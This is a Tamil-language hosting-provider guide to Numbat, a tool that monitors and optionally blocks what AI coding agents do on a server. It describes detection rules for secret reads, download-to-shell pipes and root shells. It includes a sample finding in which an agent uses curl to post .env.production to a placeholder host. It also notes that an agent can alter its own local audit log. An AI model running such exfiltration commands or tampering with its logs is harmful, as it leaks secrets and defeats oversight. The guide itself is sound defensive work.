SSD Nodes Learn 🎉 VPS $4.99/மாதம் முதல்
கல்வி வழிகாட்டிகள் Matt Connorஆல் Matt Connor · புதுப்பிக்கப்பட்டது 2026-08-07

AI coding agents-ன் செயல்பாடுகளை கண்காணிக்க Numbat

Perplexity வெளியிட்ட Numbat கருவி மூலம் உங்கள் சர்வரில் AI agents செய்யும் பணிகளை எவ்வாறு கண்காணிக்கலாம் என்பதை அறியுங்கள். இது SSH key திருட்டு போன்ற ஆபத்துகளை கண்டறிய உதவும்.

Numbat என்றால் என்ன

நீங்கள் வைத்திருக்கும் ஒரு machine-ல் AI agent என்ன செய்தது என்பதைக் கண்காணிக்க Numbat உதவுகிறது. Coding agents ஏற்கனவே உருவாக்கும் hook callbacks மற்றும் session files-ஐ இது வாசிக்கிறது. அவற்றை ஒரே சீரான event format-க்கு மாற்றுகிறது. SSH private key-ஐ வாசிப்பது அல்லது download-ஐ நேரடியாக shell-க்கு pipe செய்வது போன்ற செயல்களைக் கண்டறியும் விதிகளுடன் (rules) அவற்றை ஒப்பிடுகிறது. Perplexity இதை Apache 2.0 உரிமத்தின் கீழ் open source-ஆக வெளியிட்டது. இதன் முதல் tagged release 29 July 2026 அன்று வெளியிடப்பட்டது.

கீழே உள்ள தகவல்கள் அனைத்தும் 2 August 2026 அன்று வாசிக்கப்பட்ட, இந்த project-ன் repository மற்றும் அதன் ஆவணங்களிலிருந்து பெறப்பட்டவை. Perplexity ஒரு கருத்தைச் சொல்லும்போது, இந்தப்பதிவு அதை அப்படியே குறிப்பிடுகிறது. இது ஒரு install tutorial அல்ல, ஏனெனில் இந்த repository சில நாட்களே ஆன புதியது என்பதால், அதன் commands மாறக்கூடும்.

சிக்கல்: ஏஜென்ட் என்ன செய்தது என்பதை யாரும் பதிவு செய்வதில்லை

உங்கள் VPS-ல் இயங்கும் ஒரு கோடிங் ஏஜென்ட், நீங்கள் வழங்கிய பயனர் கணக்கின் அனுமதியுடன் shell commands-ஐ இயக்குகிறது, கோப்புகளைப் படிக்கிறது, எழுதுகிறது மற்றும் network connections-ஐ உருவாக்குகிறது. ஏஜென்ட் உங்கள் shell-ல் தட்டச்சு செய்யாததால், உங்கள் shell history-ல் இவை எதுவும் பதிவாகாது. sshd உங்கள் login-ஐ மட்டுமே பதிவு செய்யும், அதன் பிறகு அந்த model என்ன செய்தது என்பதைப் பதிவு செய்யாது. sudo-ஐ ஏதேனும் அணுகினால் ஒழிய /var/log/auth.log அமைதியாகவே இருக்கும். ஏஜென்ட் தனது சொந்த transcript-ஐ வைத்திருக்கும், ஆனால் அந்த கோப்பு ஏஜென்ட்டின் session directory-ல் இருக்கும். அதன் வடிவம் ஒவ்வொரு releases-க்கும் மாறக்கூடும், மேலும் ஏஜென்ட்டின் process-ஆலேயே அந்த கோப்பில் எழுத முடியும்.

எனவே, கடந்த செவ்வாய்க்கிழமை ஏஜென்ட் .env.production-ஐப் படித்ததா என்று யாராவது கேட்டால், பெரும்பாலான server-களில் உங்களால் அதை உறுதிப்படுத்த முடியாது என்பதே உண்மையான பதில். இந்த இடைவெளிதான் இந்தத் திட்டம் உருவாவதற்கான காரணம்.

Numbat எதைச் செய்கிறது என்று Perplexity கூறுகிறது

இந்தக் கருவி "AI agent செயல்பாடுகளுக்கான endpoint visibility, local detection, விருப்பத்தேர்வாக pre-action blocking, மற்றும் forensic reconstruction ஆகியவற்றை வழங்குகிறது" என்று README விவரிக்கிறது. இங்கே endpoint என்பது agent இயங்கும் கணினியைக் குறிக்கிறது; வெளியிலிருந்து கண்காணிக்கும் network appliance அல்ல. இவை தனித்தனி திறன்கள், மேலும் இவை வெவ்வேறு முக்கியத்துவத்தைக் கொண்டவை.

Detection சாதனத்திலேயே இயங்குகிறது. விதிகள் CEL (common expression language)-ல் எழுதப்பட்டு உள்ளூர் அளவில் மதிப்பீடு செய்யப்படுகின்றன; இதில் multi-step sequence விதிகளும், YAML-ல் உங்கள் சொந்த விதிகளைச் சேர்க்கும் வசதியும் உள்ளன. ஒரு விதியைச் செயல்படுத்த எந்தத் தரவும் கணினியை விட்டு வெளியேற வேண்டிய அவசியமில்லை.

Blocking என்பது விருப்பத்தேர்வு மற்றும் குறிப்பிட்ட எல்லைக்கு உட்பட்டது. இது synchronous pre-action hooks மூலம் மட்டுமே செயல்படுகிறது, அத்தகைய வசதியை வழங்கும் agent-களில் மட்டுமே இது வேலை செய்யும், மேலும் நீங்கள் இயக்கும் வரை இது முடக்கப்பட்டிருக்கும்.

Reconstruction என்பது நிகழ்வுக்குப் பிறகு நடக்கிறது. numbat scan, ஒரு agent ஏற்கனவே வட்டில் (disk) எழுதிய session artifacts-ஐப் பகுப்பாய்வு செய்கிறது, எனவே நீங்கள் எதையும் நிறுவுவதற்கு முந்தைய செயல்பாடுகளைக் கூட பார்க்க முடியும். இந்தத் திட்டம் அந்த உரிமைகோரலை கவனமாக வரையறுக்கிறது: "At-rest reconstruction என்பது disk அல்லது memory acquisition அல்ல, மேலும் ஒரு agent சேமிக்காத (persist) செயல்பாடுகளை இதைக் கொண்டு மீட்க முடியாது."

இதன் வெளியீடு versioned NDJSON (newline delimited JSON) வடிவில் உள்ளது; இது events, findings, enforcement decisions, indicators மற்றும் scan summaries ஆகியவற்றை உள்ளடக்கியது. v0.1.2 பதிப்பின்படி இது schema version 0.2.0-ல் உள்ளது. பதிவுகள் stdout-க்கு அல்லது உள்ளூர் கோப்பிற்குச் செல்கின்றன, விருப்பத்தேர்வாக நீங்கள் இயக்கும் collector-க்கு HTTP வழியாகவும் அனுப்பலாம். இது cgo இல்லாமல் உருவாக்கப்பட்ட ஒரே static Go binary-ஆக வருகிறது; macOS, Linux மற்றும் Windows (amd64 மற்றும் arm64) ஆகியவற்றிற்கு இது கிடைக்கிறது. எனவே, ஒரு Linux VPS-ல் இது எந்த runtime-ஐயும் முதலில் நிறுவ வேண்டிய அவசியமில்லாத ஒரே கோப்பாகச் செயல்படுகிறது.

Numbat எந்தெந்த agents-ஐக் காண முடியும்?

docs/agent-coverage.md-ல் உள்ள coverage matrix-தான் இதற்கான அதிகாரப்பூர்வமான பட்டியல், இது சீரற்றதாக உள்ளது. திட்டக் குழுவினர் இதை மறைக்காமல் வெளிப்படையாகக் கூறுகின்றனர். Claude Code, Codex, Gemini CLI, Cursor மற்றும் GitHub Copilot CLI ஆகியவற்றுக்கு artifact scanning மற்றும் pre-action hook மூலம் live capture ஆகிய இரண்டு வசதிகளும் உள்ளன. OpenClaw, 2026.7.1 பதிப்பிலிருந்து ஒரு native plugin-ஐப் பெறுகிறது. நீண்ட வரிசையில் உள்ள பல பதிவுகள் deferred என குறிக்கப்பட்டுள்ளன; அதாவது, live hook பாதை உள்ளது, ஆனால் artifact parser இல்லை. பெரும்பாலும் அந்த agent தனது வரலாற்றை SQLite-ல் சேமித்து வைப்பதாலும், அது இயங்கும்போது write-ahead log-ஐப் படிப்பது பாதுகாப்பற்றது என்பதாலும் இவ்வாறு நிகழ்கிறது. 2026 ஆகஸ்ட் 2 அன்று இந்த matrix சரிபார்க்கப்பட்டபோது, OpenCode மற்றும் Cline ஆகியவை அந்தப் பிரிவில் இருந்தன.

இந்தக் கருவியைப் பயன்படுத்துவதற்கு முன்பு உங்கள் agent-க்கான வரிசையைச் சரிபார்க்கவும், ஏனெனில் "supported" (ஆதரிக்கப்படுகிறது) என்ற சொல் ஒவ்வொரு வரிசையிலும் வெவ்வேறு அர்த்தங்களைக் கொண்டுள்ளது.

கண்டறிதல் எவ்வாறு அமையும்

விதிகள் (rules) எதற்காக உருவாக்கப்பட்டுள்ளன என்பதை அவற்றின் ids விளக்குகின்றன. secrets.read_private_key என்பது SSH key, AWS credentials, kube config அல்லது package registry login ஆகியவற்றைக் குறிக்கும். curl அல்லது wget-ன் வெளியீடு ஒரு interpreter-க்கு அனுப்பப்படும்போது exec.download_pipe_shell தூண்டப்படும். privilege.elevated_shell என்பது sudo, doas, su அல்லது pkexec வழியாக interactive root shell கோரப்படுவதைக் கண்டறியும். impact.cryptomining_launch என்பது அறியப்பட்ட miner binaries மற்றும் image பெயர்களுடன் பொருந்தும்.

Sequence விதிகள் ஒரு session-க்குள் நடக்கும் நிகழ்வுகளை இணைக்கின்றன. chain.secret_read_then_egress என்பது ஒரு secret கோப்பு வாசிக்கப்பட்ட பிறகு, தரவை வெளியே அனுப்பும் ஒரு கட்டளை (command) இயங்குவதை எதிர்பார்க்கிறது. கீழே உள்ள கண்டுபிடிப்பு, இரண்டு Claude Code pre-action callbacks-ன் கட்டுப்படுத்தப்பட்ட மறுபதிப்பிலிருந்து (replay) பெறப்பட்டது; இது நேரடி incident அல்ல. முக்கியத் தகவல்கள் மட்டும் இங்கே சுருக்கமாகக் கொடுக்கப்பட்டுள்ளன:

{
  "record_type": "finding",
  "rule_id": "chain.secret_read_then_egress",
  "rule_version": "1.4",
  "severity": "high",
  "confidence": "medium",
  "title": "Secret-file access followed by data-bearing egress",
  "observed_command": "curl --data-binary @/workspace/acme-api/.env.production https://collector.example.invalid/ingest",
  "source_agent": "claude-code",
  "source_type": "hook",
  "tags": ["attack.t1048", "attack.t1552", "attack.t1567"]
}

பதிவுக்குள் இருக்கும் "confidence": "medium"-ஐ கவனிக்கவும். இந்த வகை வெளியீடுகளைப் பற்றி அந்தத் திட்டம் என்ன சொல்கிறது என்பதையும் கவனிக்கவும்: "கண்டறிதல்கள் என்பது விதிகளின் பொருத்தம் மட்டுமே, அவை ஊடுருவலுக்கான (compromise) ஆதாரங்கள் அல்ல." ஒரு key-ஐ வாசித்துவிட்டு, build artifact-ஐ upload செய்யும் ஒரு deploy script-ம் அதே sequence விதியுடன் பொருந்தும். அந்தப் பொருத்தம் சரியாக இருந்தாலும், எச்சரிக்கை தவறானதாக இருக்கலாம்; இது நீங்கள் இதுவரை பயன்படுத்திய அனைத்து கண்டறிதல் கருவிகளிலும் இயல்பாக நடக்கும் ஒரு விஷயமாகும்.

Blocking இயல்பாகவே முடக்கப்பட்டுள்ளது, மேலும் இது தோல்வியுற்றால் அனுமதிக்கும் (fails open) முறையில் செயல்படுகிறது

Numbat வெளியிடும் ஒவ்வொரு விதியும் கண்காணிப்புக்கு மட்டுமே (monitor only). ஒரு விதியை தடுப்பு விதியாக (block) மாற்ற, நீங்கள் திட்டமிட்டுச் செயல்பட வேண்டும்: அந்த விதியின் முழுமையான YAML கோப்பை உங்கள் சொந்த directory-க்கு நகலெடுக்கவும், அதே id-ஐத் தக்கவைக்கவும், enforce: true-ஐச் சேர்க்கவும், version-ஐ உயர்த்தவும், பின்னர் அந்த policy-ஐச் சரிபார்த்து நிறுவவும்.

numbat rules check --rules-dir ./numbat-policy
numbat hook install --agent codex --emit all \
  --rules-dir ./numbat-policy --enforce

இப்போது, இதை எந்த அளவுக்கு நம்பலாம் என்பதைத் தீர்மானிக்கும் பகுதி. Numbat-ன் deny என்பது agent-க்குத் திருப்பி அனுப்பப்படும் ஒரு பதில்; அந்த agent தான் tool call-ஐ உண்மையில் மறுக்கும் காரணியாகும். Numbat-க்கே ஒரு சிக்கல் ஏற்படும்போது என்ன நடக்கும் என்பதை enforcement guide தெளிவாகக் கூறுகிறது: "தவறான payloads, மதிப்பீட்டுப் பிழைகள், panics மற்றும் output தோல்விகள் ஆகியவை numbat deny-ஐத் தடுத்துவிடும்." Hook input அதிகபட்சம் 4 MiB ஆகக் கட்டுப்படுத்தப்பட்டுள்ளது, அளவு அதிகமான input-ம் இதே பாதையையே பின்பற்றும்.

ஒரு deny செயல்முறைக்கு வரும்போது அதன் வரம்பைப் பற்றி guide தெளிவாகக் கூறுகிறது: "Fail-open என்பது numbat தனது deny பதிலைத் தடுத்து வைப்பதைக் குறிக்கும். இது tool இயங்கும் என்பதற்கு உத்தரவாதம் அளிக்காது: host இன்னும் prompt செய்யலாம், மறுக்கலாம், time out ஆகலாம் அல்லது மற்றொரு hook அல்லது policy-ஐப் பயன்படுத்தலாம்."

எனவே, இங்குள்ள enforcement என்பது ஒரு பாதுகாப்பு அரண் (guardrail) மட்டுமே, எல்லை (boundary) அல்ல. process செயலிழந்தால், Numbat அந்தச் செயலைத் தடுக்காது; ஏனெனில், ஒவ்வொரு முறை சிக்கல் ஏற்படும்போதும் உங்கள் agent-ஐ முடக்கும் ஒரு கண்காணிப்பு கருவி ஒரு வாரத்திற்குள் நீக்கப்பட்டுவிடும். இந்த வர்த்தகம் நியாயமானது. எனவே, deny எப்போதும் வந்து சேரும் என்ற அனுமானத்தில் ஒரு பாதுகாப்பு மாதிரியை (security model) உருவாக்காதீர்கள்.

நீங்கள் ஏற்கனவே செய்யும் பணிகளுக்கு இடையே Numbat எவ்வாறு பொருந்துகிறது

Numbat உங்கள் endpoint-ல், agent-ன் சொந்த process tree-க்குள் இயங்குகிறது, மேலும் இது இயல்பாகவே ~/.numbat/records.ndjson-ல் எழுதுகிறது. உங்கள் பயனர் கணக்கில் இயங்கும் ஒரு agent-ஆல் அந்த கோப்பை வாசிக்க முடியும். அதைத் திருத்தவும் முடியும். ஒரு audit trail-ன் மதிப்பு, அதைச் சுற்றியுள்ள isolation-ஐப் பொறுத்தது. எனவே, நீங்கள் ஏற்கனவே வைத்துள்ள அனைத்து கட்டுப்பாடுகளும் இந்த கட்டுப்பாட்டிற்கு முன்னால் இருக்க வேண்டுமே தவிர, பின்னால் இருக்கக்கூடாது.

Coding agent-க்கு ஒரு disposable VM-ஐ வழங்குதல் என்பது ஒரு தவறான run-ஆல் எட்டக்கூடிய எல்லைகளைக் கட்டுப்படுத்துகிறது. VPS-ல் குறைந்தபட்ச அதிகாரங்கள் கொண்ட பயனர் (least privilege user) அந்த agent-ஐத் தேவையற்ற கோப்புகளைத் திறப்பதிலிருந்து தடுக்கிறது. Agent-ன் சூழலில் credentials-ஐ வைக்காமல் இருப்பது, secrets.read_private_key பொருத்தம் ஏற்படும்போது, அது வாசிப்பதற்குத் தகுதியானதாக இருப்பதை உறுதி செய்கிறது. மேலும், Claude Code-க்காக நீங்கள் VPS-ல் அமைத்த sandbox தான் தொடர்ந்து containment-ஐச் செய்கிறது.

Numbat சேர்ப்பது என்னவென்றால், அது ஒரு பதிவை (record) உருவாக்குகிறது. எனவே, அந்தப் பதிவை agent-ஆல் அணுக முடியாத இடத்திற்கு அனுப்பவும். numbat ship மற்றும் HTTP sink ஆகியவை அதற்காகவே உள்ளன. இரண்டாவது இயந்திரத்தில் அந்த stream-ன் ஒரு நகல் இருப்பதுதான், ஒரு log கோப்பிற்கும் ஆதாரத்திற்கும் (evidence) உள்ள வித்தியாசம். இந்த event model-ல் MCP (model context protocol) புலங்களும் உள்ளன. எனவே, நீங்கள் VPS-ல் host செய்யும் ஒரு MCP server வழியாக வெளியேறும் tool calls, உள்ளூர் shell commands-ன் அதே stream-ல் சேரும். இது முக்கியமானது, ஏனெனில் bash-ஐ மட்டும் கண்காணிக்கும் எதற்கும் அந்தப் பாதை தெரியாது.

முதலில் read-only முறையில் முயற்சி செய்யவும்

Pinned version-ஐ நிறுவுங்கள். go install-க்கு Go 1.26.5 அல்லது அதற்குப் பிந்தைய பதிப்பு தேவைப்படுகிறது. நீங்கள் source-லிருந்து build செய்ய விரும்பவில்லை என்றால், releases பக்கத்தில் உள்ள prebuilt binaries மற்றும் SHA-256 checksum-களைப் பயன்படுத்தலாம்.

go install github.com/perplexityai/numbat/cmd/numbat@v0.1.2
numbat agents
numbat scan

numbat agents, அந்த கணினியில் நிறுவப்பட்டுள்ள agents-ஐக் கண்டறியும். numbat scan, ஏற்கனவே disk-ல் உள்ள session artifacts-ஐப் பகுப்பாய்வு செய்து பதிவுகளை அச்சிடும். இந்த commands "எந்தவொரு hooks-ஐயும் நிறுவாது அல்லது agent configuration-ஐ மாற்றாது" என்றும், numbat "artifacts-ல் உள்ள agents அல்லது commands-ஐ ஒருபோதும் இயக்காது, மேலும் configured HTTP sinks-க்கு மட்டுமே outbound requests-ஐ அனுப்பும்" என்றும் README குறிப்பிடுகிறது. Scanning என்பது secrets redaction வசதியுடன் read-only முறையில் நடக்கும், மேலும் சாதாரண record output-ல் முழுமையான raw transcript இருக்காது.

Live capture என்பது அடுத்த கட்டமாகும், இது agent configuration-ஐ மாற்றும்:

numbat hook install --agent codex --emit all
numbat hook status --agent codex

--emit all, events, findings, indicators மற்றும் பொருந்தக்கூடிய enforcement decisions ஆகியவற்றை ~/.numbat/records.ndjson-க்கு எழுதும். திட்டத்திலிருந்து இரண்டு எச்சரிக்கைகள் நேரடியாக வழங்கப்பட்டுள்ளன. Hooks இயங்குவதற்கு முன்பு, அவை agent-க்குள் நம்பகமானதாக (trusted) இருக்க வேண்டும், மேலும் --enforce போன்ற flags-ஐ மாற்றிய பிறகு அந்த நம்பிக்கையை மீண்டும் சரிபார்க்க வேண்டும். மேலும், hook status "execution அல்லது delivery-ஐ அல்ல, configuration-ஐ மட்டுமே சரிபார்க்கிறது", எனவே ஒரு healthy status line என்பது பதிவுகள் எங்கும் சென்றடைகின்றன என்பதற்குச் சான்றல்ல.

இந்த repository ஏன் ஒரு dependency இல்லை

பொது வெளியீடுகள் (public releases) 29 ஜூலை 2026 அன்று v0.1.1 மற்றும் 1 ஆகஸ்ட் 2026 அன்று v0.1.2 ஆகும். இந்த பதிவு 2 ஆகஸ்ட் 2026 அன்று எழுதப்பட்டபோது, இந்த repository 597 stars பெற்றிருந்தது. இவ்வளவு வேகமான எண்கள் Perplexity-ன் வாசகர்களைக் குறிக்கின்றனவே தவிர, குறியீட்டின் (code) தரத்தை அல்ல. ஒரு star என்பது, அந்தப் பக்கத்தை பிற்காலத்தில் பார்ப்பதற்காக ஒருவர் சேமித்து வைத்துள்ளார் என்பதையே குறிக்கிறது.

இந்த மென்பொருள் எந்த நிலையில் உள்ளது என்பதை அதன் version எண் வெளிப்படையாகக் காட்டுகிறது. v0.1.2-ன் குறிப்புகள் பெரும்பாலும் credential redaction திருத்தங்கள், case bundle மற்றும் telemetry normalisation பணிகளைப் பற்றியவை. பிற நிரல்களின் (programs) transcripts-ஐப் பாதுகாப்பாகப் படிக்கும் ஒரு கருவியில், redaction பிழைகள் ஆரம்பகாலக் குறைபாடுகளாக எதிர்பார்க்கப்படுபவைதான். இவை இன்னும் தொடரும், ஏனெனில் இவை ஒரு டஜன் முகவர்களிடமிருந்து (agents) உள்ளீடுகளைப் பெறுகின்றன, அவை ஒவ்வொன்றும் தங்கள் சொந்த கால அட்டவணையில் வடிவத்தை மாற்றிக்கொள்கின்றன.

இதிலிருந்து இரண்டு நடைமுறை விதிகளைப் பின்பற்ற வேண்டும். நீங்கள் வைத்திருக்கும் எதிலும் @latest-ஐப் பயன்படுத்தாமல், tag-ஐ pin செய்யவும். மேலும், record schema மாறுவது நிற்கும் வரை, இதை நீங்கள் சார்ந்திருக்கும் ஒரு கட்டுப்பாட்டு கருவியாகக் கருதாமல், நீங்கள் மதிப்பீடு செய்யும் ஒரு கருவியாகக் கருதவும்.

FAQ

Numbat அபாயகரமான AI agent கட்டளைகளைத் தடுக்கிறதா?

நீங்கள் விருப்பத்தேர்வு (opt-in) செய்தால் மட்டுமே, அதுவும் சிறந்த முயற்சியின் அடிப்படையில் மட்டுமே இது செயல்படும். Numbat வெளியிடும் ஒவ்வொரு விதியும் (rule) கண்காணிப்புக்கு மட்டுமே. ஒரு கட்டளையைத் தடுக்க, அந்த விதியின் YAML கோப்பை உங்கள் சொந்த directory-க்கு நகலெடுத்து, அதன் id-ஐ அப்படியே வைத்து, enforce: true-ஐச் சேர்த்து, version-ஐ உயர்த்தி, --enforce மூலம் அந்த hook-ஐ நிறுவ வேண்டும். அவ்வாறு செய்தாலும், அந்தத் தடுப்பு (deny) என்பது agent-க்குத் திருப்பி அனுப்பப்படும் ஒரு பதில் மட்டுமே; அந்த அழைப்பை நிராகரிப்பது agent-ன் பொறுப்பாகும். இந்தத் திட்டம் fail-open செயல்பாட்டைக் கொண்டுள்ளது: தவறான payloads, மதிப்பீட்டுப் பிழைகள் (evaluation errors), panics மற்றும் வெளியீட்டுத் தோல்விகள் (output failures) அனைத்தும் அந்தத் தடுப்பைச் செயலிழக்கச் செய்யும். இதை உங்கள் ஒரே பாதுகாப்பு அரணாகக் கருதாமல், ஒரு கூடுதல் பாதுகாப்பு அம்சமாக (guardrail) மட்டும் பயன்படுத்தவும்.

Numbat எந்தெந்த AI agent-களை ஆதரிக்கிறது?

ஒவ்வொரு agent-க்கும் ஆதரவு மாறுபடும், இது repository-ல் உள்ள docs/agent-coverage.md-ல் பட்டியலிடப்பட்டுள்ளது. 2 ஆகஸ்ட் 2026 அன்று அந்தப் பக்கத்தைப் பார்த்தபோது, Claude Code, Codex, Gemini CLI, Cursor மற்றும் GitHub Copilot CLI ஆகியவற்றுக்கு artifact scanning மற்றும் live capture வசதிகள் இருந்தன. OpenClaw, 2026.7.1 பதிப்பிலிருந்து ஒரு native plugin-ஐக் கொண்டுள்ளது. பல agent-கள் live hook path-உடன் பட்டியலிடப்பட்டுள்ளன, ஆனால் அவற்றுக்கு இன்னும் artifact parser இல்லை. பொதுவாக, அவற்றின் session history ஒரு SQLite database-ல் இருப்பதால், agent இயங்கும்போது அதைப் படிப்பது பாதுகாப்பானது அல்ல என்பதே இதற்குக் காரணம். உங்கள் agent-க்கான வரிசையை கவனமாகப் படிக்கவும், ஏனெனில் "supported" என்ற சொல் அங்கு பல்வேறு நிலைகளைக் குறிக்கிறது.

Agent, Numbat-ன் பதிவுகளை மாற்ற முடியுமா?

ஆம், agent அதே பயனர் கணக்கில் (user) இயங்கினால் இது சாத்தியம். பதிவுகள் இயல்பாகவே ~/.numbat/records.ndjson-ல், agent இயங்கும் அதே machine-ல் சேமிக்கப்படுகின்றன. எனவே, அந்தப் பாதையில் எழுதும் அனுமதி (write access) கொண்ட எதனாலும் அவற்றை மாற்றவோ அல்லது நீக்கவோ முடியும். numbat ship அல்லது HTTP sink-ஐப் பயன்படுத்தி, agent-ஆல் அணுக முடியாத ஒரு collector-க்கு stream-ஐ அனுப்பவும்; உள்ளூர் கோப்பை ஒரு வசதிக்காக மட்டும் வைத்துக்கொள்ளவும். இதனால்தான் இந்தத் கருவி, தனிமைப்படுத்துதலுக்கு (isolation) மாற்றாக இல்லாமல், அதற்கு ஒரு துணையாகச் செயல்படுகிறது. குறைந்தபட்ச சலுகைகள் கொண்ட பயனர் கணக்கின் கீழ், ஒரு தற்காலிக VM-ல் (disposable VM) இயங்கும் agent-ஆல் தனது சொந்த audit trail-ஐ அவ்வளவு எளிதாக அணுக முடியாது.

Numbat ஒரு production server-க்குத் தயாரா?

நீங்கள் முழுமையாகச் சார்ந்திருக்கும் ஒரு கட்டுப்பாட்டு அமைப்பாக இதைப் பயன்படுத்த முடியாது. இதன் முதல் பொது வெளியீடு v0.1.1, 29 ஜூலை 2026 அன்று வந்தது; v0.1.2, 1 ஆகஸ்ட் 2026 அன்று வெளியானது. எனவே, flags மற்றும் record schema ஆகிய இரண்டும் இன்னும் மாற்றங்களுக்கு உட்பட்டவை. ஒரு server-ல் numbat agents மற்றும் numbat scan-ஐ இயக்குவது read-only முறையில் நடப்பதால் ஆபத்து குறைவு; உங்கள் agent-கள் disk-ல் என்னென்ன விட்டுச் சென்றுள்ளன என்பதை இது உங்களுக்குத் தெரிவிக்கும். முக்கியமான ஒரு server-ல் enforcement hooks-ஐ நிறுவுவது என்பது வேறுபட்ட முடிவு; அதற்கு ஒரு குறிப்பிட்ட பதிப்பை (pinned tag) பயன்படுத்துவதும், hook சரியாகச் செயல்படாதபோது என்ன செய்ய வேண்டும் என்பதற்கான திட்டமும் அவசியம்.